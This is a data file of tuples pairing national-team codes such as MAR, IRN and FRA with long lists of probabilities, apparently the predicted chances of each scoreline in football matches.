('MAR', 'ICE',0.0116030336180924,0.00753444112902804,0.00352764708815121,0.00112521907154046,0.000271568524651579,0.0209784190411292,0.0205238213877107,0.0100395373819356,0.00327399428333342,0.0521816676812441,0.0510509026015282,0.0249723204742215,0.0973474134296312,0.0952379167309187,0.121070857800452,0.0752878381259363,0.118447279362747,0.0465870661771714,0.00814372528970144,0.000800761889680322,5.26669414575569e-05,0.0736563674952895,0.0579402766418008,0.0360301252343449,0.0151925116206828,0.0188949079308514,0.0117497868235728,0.00199181314555601,0.00371582332208039,0.00462136487441856,0.00287379289208945,0.000165215241845058,0.000416464933533981,0.000794323047085599,0.0010321284611589,0.000859450934496899),
('MAR', 'CRO',0.00209363286761429,0.00179337949130852,0.000991996410421382,0.000372213276231303,0.000105484970609708,0.00641650567493848,0.00735132374234671,0.00421116753436897,0.00160823026564757,0.0233841061496801,0.0267909269375574,0.0153470430209999,0.0639152111898603,0.0732269919673419,0.116465266202484,0.106110564129429,0.133433042837799,0.0419477011243595,0.00586098246463274,0.000460633167566273,2.400018395645e-05,0.121569768487107,0.0764364239291725,0.0696406089782993,0.0160196814712199,0.029190805010132,0.0265955068666749,0.00167871664611851,0.00458839556568068,0.00836090034048221,0.00761754882538177,0.000110108222597425,0.000405555402915857,0.00112822988298998,0.00212906471677233,0.00261764238164509),
('MAR', 'NGA',0.00600710111580874,0.00370791289324898,0.00153672775771332,0.000431335993308861,9.13833388640403e-05,0.0147634659162164,0.0126321351555834,0.00540424719691507,0.00154135398361141,0.0442788719022258,0.0378865435514909,0.0162085224918169,0.0996015353742319,0.0852225394559229,0.149363423573064,0.111993415651895,0.127800542540836,0.0364596851043891,0.00462285861488318,0.000329709025544427,1.5538176770597e-05,0.0958254634161633,0.0546752956079056,0.0409958004471628,0.0103987250821811,0.0155940284779133,0.0116924777916604,0.000988869672605369,0.00222437775501588,0.0033356983460206,0.00250112271410598,5.86278125238564e-05,0.000177537065477242,0.000405795233866107,0.000628168562305198,0.00059766752192703),
('MAR', 'BRA',0.000188837206885358,0.000268610168736764,0.000231012472643211,0.000134831537367316,5.94492623092515e-05,0.000933467415681405,0.00166435786340794,0.00148376207404398,0.000881841556143623,0.00515682312071999,0.00919453530674016,0.00819685662352989,0.0213661646767126,0.0380955388406322,0.0590173423062405,0.0815084678414046,0.10522700213711,0.0339618762074759,0.00487162256457938,0.000393077439981167,2.10459290348489e-05,0.145328328667099,0.0938090529501226,0.129559073262592,0.0201844987739388,0.0557533601114565,0.0770006032483502,0.0021715067892848,0.00899716173510728,0.0248518431800805,0.0343227190769149,0.00014639191793938,0.000817584685515385,0.00344942987862975,0.00987654331353895,0.0208574721775767),
('MAR', 'SWI',0.00231417627080549,0.00196974876172674,0.00108939062880159,0.000408868190014083,0.000115924511818905,0.00686127116470721,0.00786645374507414,0.00450944825221986,0.00172336219923599,0.0244248308314792,0.0280030911699568,0.0160527849810582,0.0652108421485008,0.0747642909199032,0.116069147365012,0.103296066468225,0.133073384954321,0.0428586643922404,0.0061348442828234,0.000493959089389732,2.63894604437662e-05,0.118429035876047,0.0762843795496808,0.067889499658946,0.016379166140108,0.0291533706021296,0.0259451247455113,0.001758401163049,0.00469468228740171,0.00835609159911563,0.0074365273876132,0.000118281459636644,0.000425663216912668,0.00115719842466301,0.00213489457881281,0.00257004052579271),
('MAR', 'CRC',0.00599783227631658,0.00328102014284664,0.00118946440952598,0.000291364938732728,5.38199144697469e-05,0.0155558588250816,0.0115880964584056,0.00431618662265048,0.00107175882472246,0.0476833010036464,0.0355209376543404,0.0132303865848869,0.109622548978379,0.0816616225347549,0.168012742288936,0.128752167480688,0.125158494029674,0.0304162813999338,0.0032852572922657,0.000199597540397551,7.97484755971391e-06,0.0959119359960623,0.0466174422676738,0.0357240567149775,0.00755271281240435,0.0115756475575396,0.00887069452424443,0.000611825403237673,0.00140656915148365,0.00215577490728116,0.00165202167485368,3.0723694653223e-05,9.49506984926692e-05,0.000221280305731327,0.000348442117697461,0.000327988463963412),
('MAR', 'SRB',0.00547314618559864,0.00415628293187933,0.00216228853757944,0.000765366462329954,0.000204870539131142,0.0124280166177262,0.0134739830814632,0.00730399007596328,0.00263956944318683,0.0364910545837672,0.0395622139243959,0.0214459240552604,0.0803585824830773,0.0871217197507618,0.117974151059698,0.0865987172010369,0.127903088990171,0.04722702801489,0.00775028514940924,0.000715430207285033,4.40541093602858e-05,0.093887036550863,0.0693338329891837,0.0508943776374873,0.0170672493724865,0.0250563685100752,0.0183925830463571,0.00210064111981293,0.00462591571055671,0.00679129051264156,0.00498513480496867,0.000163041544463984,0.000484737890605418,0.00108985810224589,0.00166717114567229,0.0016589955106703),
('MAR', 'GER',0.00049552292084172,0.000669209171731896,0.000571143799369059,0.000332189264426873,0.000146208819670126,0.00183232640294253,0.00326980133760329,0.00291749351267947,0.00173543028412562,0.00819149121093223,0.0146177825498004,0.0130427758005817,0.0274653010038319,0.0490120525555858,0.0613923838616307,0.0686142998339609,0.109555207274777,0.0437312027888636,0.00775831309136385,0.000774222356786231,5.17138604074224e-05,0.122442774942012,0.0977510782776478,0.109250062827864,0.026012895436169,0.058145864185029,0.0649858746043874,0.00346119316991612,0.0116050557580144,0.0259404416406085,0.0289919551676911,0.00029160316761368,0.00132136538406459,0.0045310772325967,0.0105885514030152,0.0184860638292222),
('MAR', 'MEX',0.00297622298706554,0.00244217827297126,0.0013198001542856,0.000484302800107618,0.000134283122956251,0.00820739396196953,0.00920553585041155,0.00516253336234861,0.00193012488358085,0.0276749852550548,0.0310406774800271,0.0174078441151667,0.0699891596909259,0.0785008885476222,0.118000242917256,0.0994729568837552,0.132350837740389,0.0440238854844057,0.00650829946034369,0.000541214236026242,2.98979489005622e-05,0.111570356556895,0.0742233397895024,0.0625694905037333,0.0164592828523066,0.0277500027631824,0.0233929588629894,0.00182495150973083,0.00461524446953114,0.00778120455985136,0.00655947315488604,0.000126965975132001,0.000432961041196696,0.00111559339352967,0.00195182574337601,0.00222224917067239),
('MAR', 'SWE',0.00260674375780873,0.00232101638534473,0.00136379315730884,0.000544892316457747,0.000164596908468868,0.00717473277182597,0.00877486624957639,0.00536593348816521,0.00218755411805112,0.0244781320556163,0.0299373289094413,0.0183070272722553,0.0626342786540851,0.0766031900151758,0.106845104400507,0.0911312190358452,0.130674065550997,0.046843747917247,0.00746330773331852,0.000668857482573645,3.99370647416109e-05,0.111455615648926,0.0799087216182515,0.0681564144050078,0.0190970003424998,0.0325767461392776,0.0277856304652509,0.00228195004685283,0.00583901969253771,0.00996053091137687,0.0084956192358186,0.000171699488434592,0.000592932613333076,0.00154806962450905,0.0027483213768485,0.00325025254180667),
('MAR', 'KOR',0.0102994941802182,0.0061725303744848,0.00260130906275198,0.000744467086205318,0.000160995594269219,0.020608011417824,0.0180290648934662,0.00788642762133956,0.00229983237230706,0.0538822887412145,0.0471393023144208,0.0206200764166006,0.105661615565216,0.0924388134862028,0.138132922272744,0.090291560059627,0.12084656637105,0.0404353756708503,0.00601320668106104,0.000503006164007607,2.79581055158233e-05,0.0789922114580819,0.0528617376777029,0.0345534481125239,0.0117917250267521,0.0154154886603695,0.0100764430182543,0.00131517412418682,0.00257901855985666,0.0033715873864219,0.0022038619033651,9.20663793764033e-05,0.000243455532049858,0.000486466762196747,0.000660102727229922,0.000557497325093004),
('MAR', 'BEL',0.00170815184907794,0.00196843684870277,0.00151792330289241,0.000800591336937454,0.000320018441751478,0.00451461605082303,0.00733354507894458,0.00595630755965481,0.00322514321639259,0.0157417664768844,0.0255709351096214,0.0207687213293574,0.0411668249896224,0.066871415734984,0.0717711692739926,0.062563735972529,0.116585131340999,0.0543129843451412,0.0112455745506209,0.00130973115416734,0.000102876625874291,0.101628571044947,0.0946904793894962,0.0825427565352954,0.0294086816821327,0.0512717575782293,0.0446941680959102,0.0045668295474748,0.0119428701355974,0.0208214686057365,0.0181503085094873,0.000453148768122671,0.00160524927112435,0.0043097017959067,0.0079137928194104,0.0106361009149528),
('MAR', 'TUN',0.00981707548515098,0.0057511187260462,0.00235055793865079,0.00065181945006409,0.000136533507688345,0.0202946562256475,0.0171878056840894,0.00727828697735408,0.00205469165362041,0.0539955617829377,0.0457295365543335,0.0193644666748788,0.107744644446251,0.0912503267684388,0.143331637187971,0.0953363312142747,0.121389409161605,0.0386405383680144,0.00546667205861517,0.000435036204734004,2.29612715715382e-05,0.0807415665151362,0.0514031268521655,0.034190536180094,0.0109083898344747,0.0145113233432204,0.00965213511649477,0.00115744873967582,0.00230961395350348,0.00307245664904465,0.00204362937926034,7.69120447435213e-05,0.000206841431468297,0.000420180882906863,0.000579125611268507,0.00049284252475329),
('MAR', 'PAN',0.0211067693205473,0.00925583871222721,0.00296973023130997,0.000645584181918203,0.000105948919200441,0.0357920795650457,0.0237291215356495,0.00786586328171216,0.00173828053639026,0.080992045361619,0.0536954016408587,0.0177992551274636,0.137454532362477,0.0911284100754072,0.155519375453306,0.0879791874654428,0.103104882592063,0.0302077602685823,0.00393346510639831,0.000288107526946694,1.39559640221947e-05,0.058327676327977,0.0341777890482683,0.0193347877141828,0.00667562603648379,0.00755296441747014,0.00427280311837376,0.000651943619232418,0.00110643711870942,0.00125184966055741,0.000708186460006713,3.97362338191601e-05,9.0809905606505e-05,0.000156670603099539,0.000183137155808256,0.000127334583205057),
('MAR', 'ENG',0.000480811685947176,0.000521019239188269,0.000344432491142172,0.000154159458677516,5.20730696063121e-05,0.00212080033161825,0.00289264838556084,0.00197270213460008,0.000896883684234621,0.0103458954338433,0.0141112000397759,0.00962342833618795,0.0378527686219095,0.0516289762929384,0.0923285375349123,0.112601523662415,0.125930758808289,0.0352094614225121,0.00437526563678498,0.00030582430398546,1.41159411992414e-05,0.153581933564317,0.0858811177856842,0.104738415388013,0.0160078863030892,0.039045617670722,0.0476190369678597,0.00149190200651619,0.00545845662372421,0.0133139882659603,0.0162373996685884,8.66198353216909e-05,0.000426558426418805,0.00158531889612751,0.00398905898664608,0.00677159595183816),
('MAR', 'POL',0.00589290845287556,0.00520546084320198,0.00326343299121995,0.00140040366164813,0.000455588399941324,0.0115350515951457,0.0152573238414501,0.0100903723265895,0.00444881923580845,0.0317942946546512,0.0420540684933425,0.0278122961376031,0.0657264402492259,0.0869358559479845,0.0905815544320853,0.0624179399661726,0.11981152391324,0.0574946933133027,0.0122623699150248,0.00147110472876789,0.000119217396492555,0.0825597281230066,0.0792368896317386,0.0546005580401945,0.0253492625733051,0.0349353410726378,0.0240732457666599,0.00405483554438372,0.00838231855819409,0.0115521765954011,0.0079603741592997,0.000415241874253243,0.0011633495001035,0.00247092836290272,0.00359230434659775,0.00361828394625946),
('MAR', 'SEN',0.00652706704826443,0.00402355977233794,0.00167690850513661,0.000473534580746968,0.000100949784927981,0.0155375506665517,0.0133811298682908,0.00576199686793375,0.00165410087353702,0.0456150769179907,0.0392842656665122,0.0169160465489476,0.100437415469551,0.0864979383736951,0.147431874251277,0.108207471506641,0.126970144678517,0.0372465445666897,0.00485610249618914,0.000356133007689887,1.72735090465654e-05,0.0931896062657275,0.0546741256650069,0.0401280179411102,0.010692394202236,0.0156953433150323,0.011519580980526,0.00104553380950711,0.00230210537190857,0.0033792557098137,0.00248020123050259,6.38089338402815e-05,0.000189192484325835,0.000423484615768237,0.000642265831501744,0.00060019781526926),
('MAR', 'COL',0.000765489291251667,0.000767490724388996,0.000476513446644596,0.000200386957653741,6.36081967897911e-05,0.00303580350657679,0.00389206275293493,0.0024949164924486,0.00106620554008251,0.0135610454085907,0.0173859868108365,0.0111448833139035,0.0454332647457552,0.0582478797056864,0.101476028495082,0.113324283614208,0.130097705587943,0.0373384513439032,0.00476277918271923,0.000341733157345163,1.62049202210695e-05,0.145287803476861,0.0833961145812256,0.0931333742686215,0.0159566317355574,0.0356394290778815,0.0398006586241796,0.00152653452515591,0.00511431420921343,0.0114229144071235,0.0127566442160911,9.1070722137697e-05,0.000410772010995752,0.00139853148841448,0.0032250460508956,0.00494635995741178),
('MAR', 'JPN',0.0118318724116783,0.00830409926167381,0.0042710199261702,0.00150078628289356,0.000399491295521872,0.0200630776389848,0.0216873835321887,0.0117215965799364,0.00422352550977709,0.0486990684181961,0.052641742879641,0.0284518080470181,0.0886553638781665,0.0958328982825403,0.107596494137909,0.0652921890133951,0.116307501624452,0.0517957627800876,0.01025175506309,0.00114136548784687,8.55009544873362e-05,0.070578241796671,0.0628618759491519,0.0381461265917077,0.0186630484941368,0.0226503902308098,0.0137448117805925,0.00277043417679936,0.00504350202216361,0.00612104120973445,0.00371439778616311,0.000262047508860923,0.000645749800463628,0.00120545149841994,0.00153738765650317,0.00129177425173866),
('IRN', 'FRA',0.000206439800910152,0.000207143884951418,0.000121287220040993,4.7863772345669e-05,1.42289366692503e-05,0.00122885141332756,0.00147096683232224,0.000880392616359129,0.000351284222008832,0.0074576997291673,0.00892705890073263,0.00534295986103263,0.0339446767000606,0.040632653401507,0.103002366066057,0.156276159424831,0.123296488485624,0.0243191669939229,0.00213188691401024,0.000105124068233337,3.39146240600982e-06,0.187066593001796,0.0737945381911724,0.111961768020451,0.00970355668439439,0.0294446550951225,0.0446737078923363,0.000637980903704055,0.00290385189850821,0.00881150287259102,0.0133688951068005,2.58417238983419e-05,0.000157871958048135,0.000726544381774118,0.00225355550711525,0.00450048016862868),
('IRN', 'AUS',0.00558952960657888,0.0030056683344777,0.00106351841246116,0.000254114583031802,4.57748327869505e-05,0.0149812368470524,0.0108791512235169,0.0039501388487639,0.000956177346555265,0.0468879629721571,0.0340493408484576,0.0123630622736041,0.110061727252059,0.0799251882151649,0.1722344504907,0.134763948724412,0.125074094476808,0.0290202410534585,0.00299262393871837,0.00017359043942561,6.6136862177627e-06,0.0978635737902793,0.0454134729278163,0.0355335353618594,0.00702468904240502,0.010992862707995,0.00860130817089189,0.000543299740816121,0.00127530615747429,0.00199571332127973,0.00156153549380697,2.60092490986598e-05,8.20411395275077e-05,0.000195095905881605,0.000313289071844696,0.000299099158747381),
('IRN', 'PER',0.000774021897173146,0.00053654319124614,0.000222566311108518,6.21464954310971e-05,1.30654789956536e-05,0.00362722799872707,0.00306821783429307,0.00129767975461947,0.000365895955784215,0.0175913248314574,0.0148802381862021,0.00629348530027014,0.0639857853092877,0.0541246173927034,0.15515908213746,0.188122570140939,0.13124674355562,0.0228916015779626,0.00177452164985922,7.73764771215661e-05,2.20176697836601e-06,0.159130064319651,0.0555098272581105,0.0673028689524203,0.00645455429891961,0.0156516438109793,0.0189768295873482,0.000375260321059769,0.00136495270074752,0.00330987276604217,0.00401305397666452,1.33998634453345e-05,6.53682285469144e-05,0.000240095785749933,0.000593614955563373,0.000881636904232375),
('IRN', 'DEN',0.00105764529627947,0.000731232525173592,0.000306917531838775,8.67895744754096e-05,1.84849461827821e-05,0.00450999911485513,0.00386688348829728,0.00165773734442811,0.000473782588558869,0.0203340404529945,0.017434452485603,0.00747416958708729,0.0687594150155337,0.0589544786633706,0.155006319385388,0.174717593539567,0.13290277043266,0.025273851978559,0.0021361233287049,0.000101555566979301,3.15633594038163e-06,0.149803261678664,0.0569755686694324,0.0642208284664941,0.0072232860371414,0.0162836606773372,0.0183543614146832,0.000457879248885448,0.00154831546508893,0.00349041191576006,0.00393426779502589,1.78644666947454e-05,8.10608754278395e-05,0.000277036692087521,0.000637885840152394,0.00088684709955431),
('IRN', 'ARG',0.000260533530405618,0.000250539168029406,0.000141330952248731,5.37369062440979e-05,1.53918829222998e-05,0.0014780159700482,0.00170471358146406,0.000983090999596318,0.000377959059709905,0.00859767146537626,0.0099163795337847,0.00571867530959213,0.0375097205262951,0.0432629493279502,0.109097689192306,0.158656284559055,0.125831057472541,0.0249493032511493,0.00219860129294971,0.000108982574508963,3.53480085303172e-06,0.182990934166718,0.0725654921835623,0.105529012230032,0.00959200643795311,0.0278985213010268,0.0405716726640323,0.000633955512029006,0.00276580632070845,0.00804439686857271,0.0116986356735432,2.58169999327082e-05,0.000151182215081079,0.000666928616082049,0.00198304112277831,0.00376602856065396),
('IRN', 'ICE',0.003943752930533,0.00229770993234724,0.000865140535735857,0.000219930498735379,4.21470274141609e-05,0.0116179587228126,0.00897462406963511,0.00346635235642217,0.00089256096341887,0.0391978210146306,0.0302794764853484,0.0116951232555064,0.0991871211384618,0.0766199248943064,0.167323671657902,0.141133298233338,0.129253949588589,0.0295936247741982,0.00301141067234479,0.00017237105280351,6.47818015172837e-06,0.109022447537606,0.049922952678228,0.042108751853297,0.00762014692204529,0.0128548035968236,0.0108427027197369,0.000581562547870691,0.00147160003776007,0.00248251505541922,0.00209393885643129,2.74615781472984e-05,9.33689645381671e-05,0.000239310793226912,0.000414123016180352,0.000429338318220596),
('IRN', 'CRO',0.00067570563398127,0.000501010234035993,0.000222045839702213,6.62745541070748e-05,1.48965609863817e-05,0.003218787020242,0.00291179082957687,0.00131703740910613,0.000397141058202788,0.0159111412169952,0.0143935944790363,0.00651039291278663,0.0589890881025413,0.0533629235801901,0.145797734543918,0.180177216514922,0.131892077278895,0.0241366810762966,0.00196315177748429,8.98157973835427e-05,2.68413622278985e-06,0.162992569389506,0.0596563454958969,0.0737234656802258,0.00727820409493865,0.0179888467973216,0.0222306632842669,0.000443978376543574,0.00164600886965782,0.00406828401581896,0.00502759588312812,1.66534051975029e-05,8.28287056530156e-05,0.000310237099198119,0.000782554724560507,0.00120051312030965),
('IRN', 'NGA',0.00193099785034712,0.0010412066864333,0.000345281526942219,7.70392885118875e-05,1.29396189291476e-05,0.00741341140267385,0.00500849801503127,0.00169186970775185,0.000381008850613201,0.030158741967193,0.0203752349726667,0.00688275062406424,0.0920173251867228,0.0621668710278189,0.187169348635956,0.190357440828235,0.126451543048018,0.0209999575924813,0.00154999459610671,6.43523598095907e-05,1.74191611200293e-06,0.128605416959697,0.0427153079704446,0.0434428861814274,0.00472918787337895,0.00961948211427818,0.00978333263812621,0.000261793944657841,0.000798759396651902,0.00162472964395359,0.00165240398235462,8.89090601538233e-06,3.63715097730636e-05,0.000112007458253746,0.000232078591307652,0.000279696626966193),
('IRN', 'BRA',6.42164057836668e-05,7.76947867318419e-05,5.35590260964796e-05,2.48712914415885e-05,8.6985425078508e-06,0.000485406879334999,0.000683367692455927,0.000481030886637113,0.000225735687588919,0.0036372729885714,0.00512064199097783,0.00360448260030988,0.0204412350081168,0.0287776712550576,0.0765855976844847,0.14346867423521,0.107819080019434,0.0202569551823882,0.00169149295977966,7.94490573268792e-05,2.43892158318669e-06,0.201978713169748,0.0758951706829356,0.142175289453171,0.00950607920111363,0.0356156933259782,0.0667192847994327,0.000595331303459097,0.00334572277635823,0.0125351613252449,0.0234822607778865,2.29406112285782e-05,0.000172987740632009,0.000982444795026178,0.00375859782955457,0.00962238807348337),
('IRN', 'SWI',0.000749661377008818,0.000553552010985156,0.000245383442178555,7.32735884769532e-05,1.64789030375657e-05,0.00346615034505221,0.00313778203854097,0.00142026097273083,0.000428570501049474,0.0167363702601453,0.0151508378935779,0.00685775605192312,0.0606089021537645,0.0548670731566043,0.146325595621421,0.176633952877447,0.132463332519636,0.0248346002797972,0.00206936049337235,9.69923897243187e-05,2.97105293090392e-06,0.159900405222323,0.0599571605626837,0.0723760612661004,0.00749395870873747,0.018092358261768,0.021839820593788,0.000468329525624791,0.00169600325238416,0.00409459134322177,0.00494270227501578,1.80076716047919e-05,8.74995840601216e-05,0.000320208639661112,0.000789360677312072,0.0011846098255398),
('IRN', 'CRC',0.00189268384087054,0.000898720667644564,0.000260183885237368,5.06114381294387e-05,7.40709863434759e-06,0.00757403518696127,0.00445498650921859,0.00131019359610886,0.000256881774424014,0.0314910061023119,0.0185227562170602,0.00544746802883912,0.0981989891309551,0.0577598546875546,0.204143820937571,0.212195155957333,0.12007575166575,0.0169869407162551,0.00106805227679498,3.77739478122973e-05,8.68608300557074e-07,0.124811482093302,0.0353137951270739,0.0367065543792595,0.00333052724893991,0.00692376331317002,0.00719683323895003,0.000157054937256334,0.000489747327427094,0.00101812545729571,0.0010582798401773,4.52862572238674e-06,1.89184381871111e-05,5.9461422967302e-05,0.00012557348111562,0.000151133677555869),
('IRN', 'SRB',0.00181808315274124,0.00121917654109289,0.000509500718449249,0.000143646610870098,3.05205286033588e-05,0.00659752893958431,0.00564776272382458,0.00241736141491121,0.000689787737912653,0.0262756090224575,0.0224930283052573,0.00962748992627892,0.0784847973942212,0.0671862931059663,0.156288503576255,0.155610367619447,0.133789543440171,0.0287571487166327,0.00274717899320351,0.000147621841041133,5.20025363754226e-06,0.133209030491517,0.0572647428452594,0.057016271074834,0.00820577694328442,0.0163403441395759,0.0162694433717388,0.000587925238963266,0.00175612269247662,0.00349700574908644,0.00348183223801329,2.60134938419087e-05,0.000104353892425971,0.000315474822280448,0.000643417895317972,0.000795951814439661),
('IRN', 'GER',0.000171447191655497,0.000200312441926005,0.00013752052024177,6.37552372018315e-05,2.22833333791062e-05,0.000996840679534963,0.00140457601004389,0.000989543167977039,0.000464764538331836,0.00604467256401597,0.00851711035302865,0.00600042169343518,0.0274904007904349,0.038734732891067,0.0833485605288826,0.126352878504667,0.117440420514514,0.0272891534681509,0.00281825321865134,0.000163716513145451,6.24691748018429e-06,0.17803469058911,0.082738395738979,0.125427894592799,0.0128170566212085,0.0388602271657901,0.0589104542488329,0.000992749127923161,0.00451489656750418,0.0136887829576207,0.020751613692496,4.75977789930567e-05,0.000290890090415584,0.00134025395588939,0.00416998071807042,0.00875452431945776),
('IRN', 'MEX',0.000969227493196521,0.000693011682498942,0.000300330442148767,8.77042662378673e-05,1.92921474238891e-05,0.00419292754802567,0.00371331778496952,0.00164428419215873,0.000485400686779677,0.0191772519310891,0.0169836539856467,0.00752048582718372,0.0657834509568911,0.058258783534172,0.150437349256222,0.172014357122046,0.133229510435934,0.0257974141635235,0.00222008397504524,0.000107469481788692,3.40229355129367e-06,0.152338423274725,0.0589949987112807,0.067456564655716,0.00761552206840486,0.0174156104082143,0.0199135058086853,0.000491534686340045,0.00168610435158553,0.00385587964043008,0.00440892278923968,1.95359419364222e-05,8.99349064240154e-05,0.000311860741348401,0.00072871161382639,0.00103411186825481),
('IRN', 'SWE',0.00085902476939105,0.000667927448643405,0.000315102035350478,0.000100252608352618,2.40339519326849e-05,0.00373084473832231,0.00360282292641625,0.00173959705502882,0.000559967924351128,0.017265001367702,0.016672562680841,0.00805022659501739,0.059922140922593,0.0578659467917028,0.138649008139832,0.160404377765742,0.133891346407433,0.0279401548955478,0.00259132921841688,0.000135188236003703,4.62018940533852e-06,0.154900192917656,0.0646484705635805,0.0747924405185764,0.00899380146550644,0.0208100317078103,0.024075326842657,0.000625602308111787,0.00217129607289244,0.00502398683106703,0.00581229892916249,2.68509947593129e-05,0.000125131330950463,0.000439396692087199,0.00104056702082276,0.00152301876273941),
('IRN', 'KOR',0.0034198348862605,0.00181955196145281,0.000614980141020478,0.000140070842848829,2.40316754889609e-05,0.010939770474239,0.00755694553593171,0.00261008336360964,0.000600995480038825,0.0387976174554859,0.0268005149400007,0.00925659419516287,0.103196071876015,0.071285507911297,0.18299112074529,0.162243337672043,0.126406119423402,0.0246212067271171,0.00213141516834653,0.000103788514591995,3.30565355353915e-06,0.112074021044824,0.0436592413954452,0.0387090970063298,0.00566925722082491,0.0100529381959276,0.00891312233989932,0.000368083324498952,0.000979048604078271,0.0017360854736762,0.00153924573272185,1.47183453138204e-05,5.25409130892887e-05,0.000141281696996293,0.000256014291956773,0.000272105328926268),
('IRN', 'BEL',0.000592962112089951,0.000602957626040962,0.000375182109778126,0.000157983904110523,5.01970750380639e-05,0.00253756703501632,0.00325470502793313,0.00208725615376405,0.000892377489211374,0.0120015424584508,0.0153932802733708,0.00987177599858004,0.0425713939950372,0.0546024314509898,0.100671703544492,0.11903288738597,0.129122381862415,0.0350167711293129,0.00422054124204335,0.000286142736415624,1.27984165889039e-05,0.152672592179235,0.0828067317369608,0.0979095816064117,0.0149709360033814,0.035402872438043,0.041859886936303,0.0013533255093879,0.00480046241248925,0.0113520062068659,0.0134224616138487,7.61258357219493e-05,0.000363345817471047,0.00130858852103442,0.0031893445487875,0.00515583478154732),
('IRN', 'TUN',0.00323603131563015,0.0016776155344895,0.000549476527265164,0.00012121852225976,2.01393854479549e-05,0.0106361661096339,0.00711254150375496,0.00237812413425998,0.000530094096928554,0.0383838359080353,0.0256677662942797,0.00858218324135551,0.103889797589789,0.0694724480191018,0.187458944421408,0.16912563436856,0.125356214702184,0.0232285611568137,0.00191300555318463,8.86201904529494e-05,2.68234116122503e-06,0.113096493736188,0.0419136590493503,0.0378145422578159,0.00517774617900781,0.00934273485671113,0.00842902409514515,0.00031981287368235,0.00086560641810457,0.00156190183431667,0.00140914929061159,1.21503611747917e-05,4.4121973848876e-05,0.000120664096708093,0.000222261547626979,0.000238745000311444),
('IRN', 'PAN',0.0071127156480864,0.00279426449254842,0.000717618411483369,0.000124030785175419,1.6139098965472e-05,0.01934354497386,0.0101258563602106,0.00265031479923088,0.000462457579563248,0.059371551750354,0.0310795051123936,0.00813466727375491,0.136672769727904,0.0715447368353156,0.209746311540363,0.160944697661325,0.10979688705518,0.0187259297482046,0.00141943083103365,6.05212104306143e-05,1.68324564138557e-06,0.0842504769760875,0.0287379461371079,0.0220514964886723,0.00326751680552788,0.00501452922348799,0.00384780015372449,0.00018575903134255,0.000427615593109499,0.000656244792510046,0.000503556505698186,6.48272084414528e-06,2.00117728588374e-05,4.65080017721579e-05,7.27410650822098e-05,6.44820107912419e-05),
('IRN', 'ENG',0.000154540737491192,0.000142376993275911,7.52911394216862e-05,2.67837286528475e-05,7.17193401921021e-06,0.00103551632217829,0.00111520261448654,0.000600510510902154,0.00021557390499842,0.00685191786945315,0.00737919486019027,0.00397352375073085,0.034003890728857,0.0366205988561972,0.112500335111025,0.186101136205455,0.121157595645146,0.0197193355207501,0.00142643303655444,5.80407515845795e-05,1.53915326917618e-06,0.20042221374035,0.0652405300305379,0.107922671993351,0.00707893381548952,0.0234203324796446,0.0387425555707902,0.000384050405021426,0.00190592010230328,0.00630565048904819,0.0104309797776892,1.27769832108613e-05,8.5007083019095e-05,0.000425716012452086,0.00143419423321606,0.00302173868563858),
('IRN', 'POL',0.00203999413740985,0.00161761144499714,0.000818842658321727,0.000280631569560115,7.25850388074597e-05,0.0065908406774767,0.00688336188551459,0.00359443302952778,0.00125132157015204,0.0246409452969475,0.0257345840963333,0.0134383809271573,0.0690931796305704,0.0721597414489712,0.129158125873622,0.120719740851277,0.13489054952901,0.0376812032231219,0.00467827214582458,0.000326714740349498,1.50664224838444e-05,0.126077643758643,0.0704386976396752,0.065836673205396,0.0131178692147088,0.024521659189606,0.0229195671785227,0.00122147696153088,0.00342501986431954,0.00640250092875611,0.00598420151803511,7.08538514559164e-05,0.000267404815280378,0.000761639583623031,0.00146872202476739,0.00179957318046553),
('IRN', 'SEN',0.00210894407405304,0.00113845954263568,0.000379794615329142,8.52697512737155e-05,1.44130915102603e-05,0.00787063594809344,0.00535206056080993,0.00181971015020177,0.000412469800883099,0.0313417019517696,0.0213124692885025,0.00724627762513257,0.093604470564241,0.063651374364955,0.186371434095379,0.185537673774512,0.126733240955591,0.0216415809743141,0.00164249822360483,7.0120234514414e-05,1.95271454515167e-06,0.126166280958977,0.0430895282881395,0.0428967608766213,0.00490545079076525,0.00976701105458192,0.00972331687843147,0.000279226164878241,0.000833931015339628,0.0016604006019007,0.00165297255293317,9.75710769087249e-06,3.90771520670819e-05,0.000117825872993433,0.000239096610364438,0.000282692563834933),
('IRN', 'COL',0.000245293673692876,0.000210055132401842,0.000104361205399561,3.48876210571231e-05,8.77978037481411e-06,0.00148614836370591,0.00150442073188798,0.000761458880488405,0.000256940368867429,0.00900468608569685,0.00911539975570454,0.0046137373316256,0.040920058933289,0.0414231758502276,0.123968876291614,0.187784214999053,0.125493088144237,0.0209662393242912,0.0015568212574853,6.50248701985579e-05,1.77091354691437e-06,0.19009304391482,0.0635180201800483,0.0962151300762521,0.007074673897415,0.0214329938923588,0.032466035456259,0.000393990639293311,0.00179041446038358,0.00542412876559776,0.00821630229111357,1.34628563739343e-05,8.20310890444824e-05,0.000376270151176279,0.00116130832409607,0.00221662758912076),
('IRN', 'JPN',0.00409058184101808,0.00259549837917446,0.00107614546597184,0.000301752961500396,6.38278545405605e-05,0.0114729874132128,0.00979235364949021,0.00417895472831483,0.00118893191200695,0.0377734380164612,0.0322401524809749,0.0137587083222812,0.0932733930706817,0.0796101327527085,0.153545742048095,0.126382744987277,0.131053417331981,0.0339741754226802,0.00391441603363625,0.000253692463179395,1.0832342379264e-05,0.107869423153337,0.0559279533424338,0.0460340232861889,0.00966580974674378,0.0159117609127269,0.0130968921372095,0.000835252074112295,0.00206247562077424,0.00339522707625642,0.00279459470532246,4.48405391029908e-05,0.000148926745335182,0.000373123597741835,0.000632212497658689,0.000654935726345697),
('FRA', 'AUS',0.0604081084484115,0.0253124359438197,0.00908822291267849,0.00223062401803567,0.000414840199747848,0.0594940843294144,0.0449480438452264,0.0169792229621183,0.00427595934823524,0.0985482182887589,0.0744536147827064,0.0281250176333424,0.12242920582804,0.0924958064910374,0.101398149386223,0.0419899182936465,0.0766067503317037,0.0349404954502612,0.00708285840505671,0.000807626549896575,6.20389103276305e-05,0.0317235689866255,0.0289383693484909,0.0119836483392427,0.00879923294993212,0.00728768867777013,0.00301789977412228,0.00133778271288822,0.00166196485287516,0.00137647025713118,0.000570009156778807,0.00012978749390188,0.000218338538001738,0.000278313970070771,0.000242516889384593,0.000131625820819658),
